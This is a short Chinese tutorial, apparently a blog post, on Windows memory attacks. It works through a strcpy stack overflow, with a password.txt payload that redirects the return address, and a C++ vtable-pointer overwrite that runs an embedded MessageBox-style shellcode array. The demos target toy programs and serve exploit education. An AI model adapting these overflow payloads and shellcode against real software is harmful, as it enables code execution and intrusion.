Windows内存攻击概览

栈溢出

例如普通栈溢出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
int __cdecl verify_password(char* Str1) {
	char Destination[8]; // [esp+4Ch] [ebp-Ch] BYREF
	int v3; // [esp+54h] [ebp-4h]
	v3 = strcmp(Str1, "1234567");
	strcpy(Destination, Str1);
	return v3;
};
int __cdecl main(int argc, const char** argv, const char** envp) {
    FILE* Stream; // [esp+4Ch] [ebp-408h]
    char Str1[1024]; // [esp+50h] [ebp-404h] BYREF
    int v6; // [esp+450h] [ebp-4h]
    v6 = 0;
    Stream = fopen("password.txt", "rw+");
    if (!Stream)
        exit(0);
    fscanf(Stream, "%s", Str1);
    v6 = j__verify_password(Str1);
    if (v6)
        printf("incorrect password!\n");
    else
        printf("Congratulation! You have passed the verification!\n"); //.text:00401122
    return fclose(Stream);
};

其中password.txt如下:

1
2
34 33 32 31 34 33 32 31 34 33 32 31 34 33 32 31
22 11 40 00

其他内存攻击技术

例如攻击C++虚函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include "windows.h"
#include "iostream.h"
char shellcode[] =
	"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
	"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
	"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
	"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
	"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
	"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
	"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
	"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
	"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
	"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
	"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x1C\x88\x40\x00";//set fake virtual function pointer
class Failwest{
public:
	char buf[200];
	virtual void test(void) {
		cout << "Class Vtable::test()" << endl;
	};
};
Failwest overflow, * p;
void main(void) {
	char* p_vtable;
	p_vtable = overflow.buf - 4;//point to virtual table
	//__asm int 3
	//reset fake virtual table to 0x004088cc
	//the address may need to ajusted via runtime debug
	p_vtable[0] = 0xCC;
	p_vtable[1] = 0x88;
	p_vtable[2] = 0x40;
	p_vtable[3] = 0x00;
	strcpy(overflow.buf, shellcode);//set fake virtual function pointer
	p = &overflow;
	p->test();
};

虚表位于整个对象内存空间之前,这里第26行获得了虚表地址,即buf数组之前。第30到第33行修改虚表地址为0x004088CC,即shellcode数组的最后4字节处。当最后调用test时,程序去0x004088CC处寻找虚表,虚表中第一个虚函数test地址为shellcode末尾的0x40881C,即shellcode地址,开始执行shellcode。